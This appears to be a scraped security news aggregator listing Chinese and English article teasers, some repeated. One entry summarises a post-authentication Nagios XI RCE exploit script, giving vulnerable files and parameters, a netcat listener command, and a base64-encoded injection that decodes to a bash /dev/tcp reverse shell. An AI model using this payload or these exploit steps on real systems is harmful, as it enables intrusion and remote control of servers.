Aggregator
全面了解风控数据体系
6 years 2 months ago
考察一个人的判断力,主要考察他信息来源的多样性。无数的可怜人,长期生活在单一的信息里,而且是一种完全被扭曲、颠倒的信息,这是导致人们愚昧且自信的最大原因。
全面了解风控数据体系
6 years 2 months ago
考察一个人的判断力,主要考察他信息来源的多样性。无数的可怜人,长期生活在单一的信息里,而且是一种完全被扭曲、颠倒的信息,这是导致人们愚昧且自信的最大原因。
全面了解风控数据体系
6 years 2 months ago
考察一个人的判断力,主要考察他信息来源的多样性。无数的可怜人,长期生活在单一的信息里,而且是一种完全被扭曲、颠倒的信息,这是导致人们愚昧且自信的最大原因。
CVE-2020-10749
6 years 2 months ago
IPv4 only clusters susceptible to MitM attacks via IPv6 rogue router advertisements
As Healthcare Industry Transforms Overnight, Tech Community Must Act
6 years 2 months ago
The healthcare industry is adopting a decade of digital transformation in a matter of months, with the risk exposure to match. F5 Labs' Preston Hogue writes for SecurityWeek, discussing the vital need for security expertise to lend a hand.
Banks Prioritizing Microsegmentation
6 years 2 months ago
Learn how microsegmentation allows financial institutions to achieve goals, from automation to streamlining firewall compliance, while protected.
Ola Sergatchov
Unix系统记录用户登录及操作日志配置——引言
6 years 2 months ago
统一Unix系统登录日志、操作命令日志,可以作为系统日志的有效补充
Nagiosxi的一个RCE漏洞利用脚本
6 years 2 months ago
登陆后的,比较鸡肋。4月份发现的,一直放着,后来看官网更新了,直接发出来吧。另外官方还有一个明显的sql注入没修复。不过也是登陆后,感兴趣的可以去看一下。
简要信息版本: 5.6.13(5.6.11版本也存在问题,只需要把最后文件名字中的 - 去掉)
条件:登陆后
漏洞文件相关路径:/includes/components/xicore/export-rrd.php、includes/utils-rrdexport.inc.php
漏洞参数:step、start、end
python3
requests库,使用pip3安装即可。python3 -m pip install requests
- 首先在远程机器上监听端口,用于反弹。命令:nc -l -v -p 4444
- python3 nagiox.py target (注:需带协议,如http或https)
另外,如果需要执行自己的命令,需要修改commond变量就可以了,这里也懒得改了。脚本中的命令"1|(echo+\"YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY4LjEuMjAvNDQ0NCAwPiYx\"|base64+-d+|sh+-i);#"
其实就是执行的bash -i >& /dev/tcp/192.168.1.20/4444 0>&1
使用 CloudWatch Event 监控 ElasticSearch 事件
6 years 2 months ago
TonghuaRoot
Watch Your Step: The Prevalence of IDN Homograph Attacks
6 years 2 months ago
The internationalized domain name (IDN) homograph attack is used to form domain names that visually resemble legitimate domain names, albeit, using a different set of characters [1]. For example, the IDN
Asaf Nadler
Record 0-Second SLA PPS Mitigation
6 years 2 months ago
On May 2, 2020, Akamai blocked a large PPS-focused attack against one of our financial services customers in 0 seconds, utilizing a proactive mitigation posture. This was one of the largest PPS levels we have on record, and the biggest mitigated to date in 0 seconds. The attacker launched a bevy of minimally sized UDP packets in an attempt to overwhelm network gear in the customer's data center.
Tom Emmons
Malicious macros are still causing problems!
6 years 2 months ago
Andrew A explains the updated guidance for Microsoft Office macros
网鼎杯Web题全解析
6 years 2 months ago
用一天时间写完的网鼎杯四组Web题的总结,如有差错还请师傅们斧正
网鼎杯Web题全解析
6 years 2 months ago
用一天时间写完的网鼎杯四组Web题的总结,如有差错还请师傅们斧正
网鼎杯Web题全解析
6 years 2 months ago
用一天时间写完的网鼎杯四组Web题的总结,如有差错还请师傅们斧正
如何搭建一个自己的DNS域名检索系统
6 years 2 months ago
最近看到一个查找子域名的平台https://rapiddns.io/ 数据来源于opendata.rap
如何搭建一个自己的DNS域名检索系统
6 years 2 months ago
最近看到一个查找子域名的平台https://rapiddns.io/ 数据来源于opendata.rap
如何搭建一个自己的DNS域名检索系统
6 years 2 months ago
最近看到一个查找子域名的平台https://rapiddns.io/ 数据来源于opendata.rap
如何搭建一个自己的DNS域名检索系统
6 years 2 months ago
最近看到一个查找子域名的平台https://rapiddns.io/ 数据来源于opendata.rap